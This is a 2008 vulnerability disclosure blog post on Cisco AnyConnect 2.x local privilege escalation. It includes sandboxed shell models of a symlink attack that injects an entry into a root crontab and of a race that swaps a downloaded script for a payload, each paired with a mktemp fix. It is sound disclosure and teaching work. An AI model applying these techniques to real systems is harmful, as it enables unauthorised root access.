Monday, December 22, 2008

Cisco AnyConnect 2.x Local Privilege Escalation

I have been holding on to these vulnerabilities for several months now. Cisco's AnyConnect VPN client, which provides SSL VPN connectivity to Cisco's ASA, suffers from a number of security vulnerabilities that result in local privilege escalation on the Linux and Macintosh platforms. Versions 2.3.0185 and newer reportedly have these issues remedied, but unfortunately I no longer have the time or the resources to validate the fixes.

Exploit code for Linux and Macintosh platforms is available, however the code is in an unknown state. At one point I had attempted to unify the code so that it would work regardless of the platform it was run on, however I never got much further than the thought. Since I cannot validate the exploit code any further, the code is being released "as is".

There are three vulnerabilities on both platforms and the exploit techniques are similar if not identical.

Vulnerability #1: /tmp/routechangesv4.bin is written mode 666 (world readable and writable) every time AnyConnect is launched, at a fixed, predictable path that is not checked before use. Because it is never executed directly by AnyConnect, we must use its world writable goodness to achieve our goal. The open that creates the file follows a symlink already sitting at that path, so the file that actually gets created and chmod'd 666 is whatever the link points at. In this case, a simple symlink attack to create a world-writable crontab for root into which we inject our commands is an easy approach.
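The following is an added example, not the exploit code released with this post. It models the symlink attack in a scratch directory: a shell function stands in for the AnyConnect launch (open a fixed path, chmod it 666), the attacker plants a symlink first, and a throwaway "root crontab" path stands in for the real one. The $FAKE_TMP and $CRON_DIR/root paths are hypothetical stand-ins for /tmp and root's crontab; nothing outside the mktemp -d sandbox is touched. The fixed variant shows the corrected pattern (mktemp, which creates the file with O_EXCL and mode 0600 so a pre-planted link makes the open fail instead of being followed).

```shell
#!/bin/sh
# Added example (not the original exploit code): a sandboxed model of the
# routechangesv4.bin symlink attack. Everything lives under a scratch
# directory from mktemp -d; no real /tmp path or crontab is touched.
# Hypothetical stand-ins: $FAKE_TMP for /tmp, $CRON_DIR/root for root's crontab.
set -eu

SANDBOX=$(mktemp -d)
FAKE_TMP="$SANDBOX/tmp"
CRON_DIR="$SANDBOX/cron"
mkdir -p "$FAKE_TMP" "$CRON_DIR"

# The vulnerable behaviour: on every launch the client opens a fixed,
# predictable path with O_CREAT (what the shell's '>' does), then chmods it
# 666. open(2) follows an existing symlink at that path, so the file that
# gets created and chmod'd is whatever the link points at.
vulnerable_launch() {
    printf 'route table snapshot\n' > "$FAKE_TMP/routechangesv4.bin"
    chmod 666 "$FAKE_TMP/routechangesv4.bin"
}

# Attacker step 1, before the client starts: plant the symlink.
attacker_plant() {
    ln -s "$CRON_DIR/root" "$FAKE_TMP/routechangesv4.bin"
}

# Attacker step 2, after the client has run: the target now exists and is
# world-writable, so append a crontab entry of our choosing.
attacker_inject() {
    printf '* * * * * /bin/sh -c "id > %s/pwned"\n' "$SANDBOX" >> "$CRON_DIR/root"
}

# The fix: let mktemp pick an unpredictable name and create the file with
# O_CREAT|O_EXCL and mode 0600; a pre-planted link makes the open fail
# instead of being followed. Never chmod it wider than needed.
fixed_launch() {
    f=$(mktemp "$FAKE_TMP/routechangesv4.XXXXXX")
    printf 'route table snapshot\n' > "$f"
    printf '%s\n' "$f"
}

# Portable permission string, e.g. "-rw-rw-rw-".
perm_of() { ls -ld "$1" | cut -c1-10; }

run_attack() {
    attacker_plant
    vulnerable_launch          # root's "crontab" is now created mode 666
    attacker_inject
    printf 'target perms: %s\n' "$(perm_of "$CRON_DIR/root")"
    cat "$CRON_DIR/root"
}

run_attack
FIXED_FILE=$(fixed_launch)
printf 'fixed-file perms: %s\n' "$(perm_of "$FIXED_FILE")"
```

One caveat for anyone re-testing this on a current system: Linux 3.6 and later ship the fs.protected_symlinks sysctl, which (when enabled, as most distributions do by default) refuses to follow a symlink in a world-writable sticky directory such as /tmp unless the process's uid matches the link's owner or the directory's owner. That blocks the real /tmp version of this attack against a root-owned process on modern Linux; the sandbox above is not a sticky world-writable directory, so it demonstrates the mechanism regardless.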

Vulnerability #2: The /tmp/Temp8-Vpn2e8 directory used as part of the Java applet is not checked for existence prior to use and, since there is no randomness in the name, the applet is easily tricked into using our maliciously placed executables. When the Java applet runs, it creates and uses /tmp/Temp8-Vpn2e8 to drop vpndownloader.sh, which in turn (you guessed it!) downloads the remainder of the files needed to utilize the VPN. Exploitation is relatively straightforward -- create /tmp/Temp8-Vpn2e8 ourselves first, so that we own the directory and can replace anything placed in it regardless of who owns the file, wait for vpndownloader.sh to be placed by the applet and then swap it out with our payload prior to the applet executing it.
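The following is an added example, not the exploit code released with this post. It models the Temp8-Vpn2e8 race in a scratch directory: a shell function stands in for the applet (create the fixed-name directory, drop vpndownloader.sh, execute it a moment later), the attacker pre-creates the directory and runs a watcher that swaps the script for a payload as soon as it appears. The one-second sleep in the model applet is an assumed stand-in for the applet's own delay between drop and exec, $FAKE_TMP is a hypothetical stand-in for /tmp, and $MARKER is a constructed file recording which script actually ran. The fixed variant shows the corrected pattern (mktemp -d, which creates a private, unpredictably named directory and fails rather than reusing one that already exists).

```shell
#!/bin/sh
# Added example (not the original exploit code): a sandboxed model of the
# Temp8-Vpn2e8 directory race. Hypothetical stand-ins: $FAKE_TMP for /tmp,
# $MARKER records which vpndownloader.sh actually got executed, and the
# 'sleep 1' stands in for the applet's delay between dropping and running it.
set -eu

SANDBOX=$(mktemp -d)
FAKE_TMP="$SANDBOX/tmp"
mkdir -p "$FAKE_TMP"
APPLET_DIR="$FAKE_TMP/Temp8-Vpn2e8"      # fixed name, no randomness
MARKER="$SANDBOX/which_ran"

# Vulnerable applet: 'mkdir -p' silently accepts a directory that already
# exists, so the applet never notices that someone else owns it.
vulnerable_applet() {
    mkdir -p "$APPLET_DIR"
    printf '#!/bin/sh\necho legitimate > "%s"\n' "$MARKER" > "$APPLET_DIR/vpndownloader.sh"
    chmod 755 "$APPLET_DIR/vpndownloader.sh"
    sleep 1                               # window between drop and exec
    "$APPLET_DIR/vpndownloader.sh"
    cat "$MARKER"
}

# Attacker step 1: create the directory before the applet does. Ownership of
# the directory is what matters: rename(2) over an entry needs write access
# to the directory, not ownership of the file being replaced (no sticky bit
# here, since we created the directory ourselves).
attacker_precreate() {
    mkdir -m 777 "$APPLET_DIR"
}

# Attacker step 2: poll until the applet has dropped its script, then swap
# it for the payload with a single atomic rename.
attacker_swap() {
    payload="$SANDBOX/payload.sh"
    printf '#!/bin/sh\necho attacker > "%s"\n' "$MARKER" > "$payload"
    chmod 755 "$payload"
    while [ ! -f "$APPLET_DIR/vpndownloader.sh" ]; do sleep 0.1; done
    mv -f "$payload" "$APPLET_DIR/vpndownloader.sh"
}

# Fixed applet: mktemp -d yields an unpredictable name, creates it
# exclusively with mode 0700, and fails instead of reusing an existing
# directory, so there is nothing for the attacker to pre-create or watch.
fixed_applet() {
    d=$(mktemp -d "$FAKE_TMP/Vpn.XXXXXX")
    printf '#!/bin/sh\necho legitimate > "%s"\n' "$MARKER" > "$d/vpndownloader.sh"
    chmod 700 "$d/vpndownloader.sh"
    "$d/vpndownloader.sh"
    cat "$MARKER"
}

# Run the watcher concurrently with the vulnerable applet; prints the name
# of the script that ended up being executed.
run_race() {
    attacker_precreate
    attacker_swap >/dev/null 2>&1 &
    vulnerable_applet
    wait
}

RACE_RESULT=$(run_race)
printf 'vulnerable applet executed: %s\n' "$RACE_RESULT"
FIXED_RESULT=$(fixed_applet)
printf 'fixed applet executed: %s\n' "$FIXED_RESULT"
```

The watcher polls every tenth of a second, which is far tighter than the modelled one-second window; against the real applet the width of that window is what decides whether the swap lands, so the released exploit had to loop rather than check once.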

Vulnerability #3: /tmp/vpn-uninstall.log is written mode 666, but I cannot recall if this happens only on install, on uninstall or at every launch. The exploit method is identical to the first vulnerability: plant a symlink at the predictable path before the file is written.

Thanks to Cisco's PSIRT for their help in getting these issues addressed.